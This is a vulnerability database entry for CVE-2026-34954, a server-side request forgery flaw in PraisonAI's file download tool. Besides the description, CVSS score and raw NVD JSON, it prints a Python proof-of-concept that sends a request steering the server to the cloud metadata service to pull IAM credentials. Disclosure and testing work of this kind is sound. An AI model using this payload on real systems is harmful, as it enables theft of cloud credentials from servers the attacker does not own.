CVE-2026-34954

Description

PraisonAI is a multi-agent teams system. Prior to version 1.5.95, FileTools.download_file() in praisonaiagents validates the destination path but performs no validation on the url parameter, passing it directly to httpx.stream() with follow_redirects=True. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services. This issue has been patched in version 1.5.95.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI < 1.5.95

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable PraisonAI endpoint
# This endpoint triggers the vulnerable FileTools.download_file() function
target_url = "http://vulnerable-target/api/download"

# Malicious payload targeting internal metadata service (SSRF)
# The application does not validate the URL, allowing access to 127.0.0.1 or metadata services
payload = {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name",
    "destination_path": "/tmp/metadata.txt"
}

try:
    print("[+] Sending SSRF payload to target...")
    response = requests.post(target_url, json=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request successful. Check if data was leaked.")
        print("Response:", response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34954
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34954
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34954/
[4] VulDB https://vuldb.com/cve/CVE-2026-34954
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-44c2-3rw4-5gvh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34954", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:06.810", "lastModified": "2026-04-13T18:46:18.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to version 1.5.95, FileTools.download_file() in praisonaiagents validates the destination path but performs no validation on the url parameter, passing it directly to httpx.stream() with follow_redirects=True. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services. This issue has been patched in version 1.5.95."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.95", "matchCriteriaId": "549FBB43-121A-41E9-B6E6-FC14EC23A7B3"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-44c2-3rw4-5gvh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}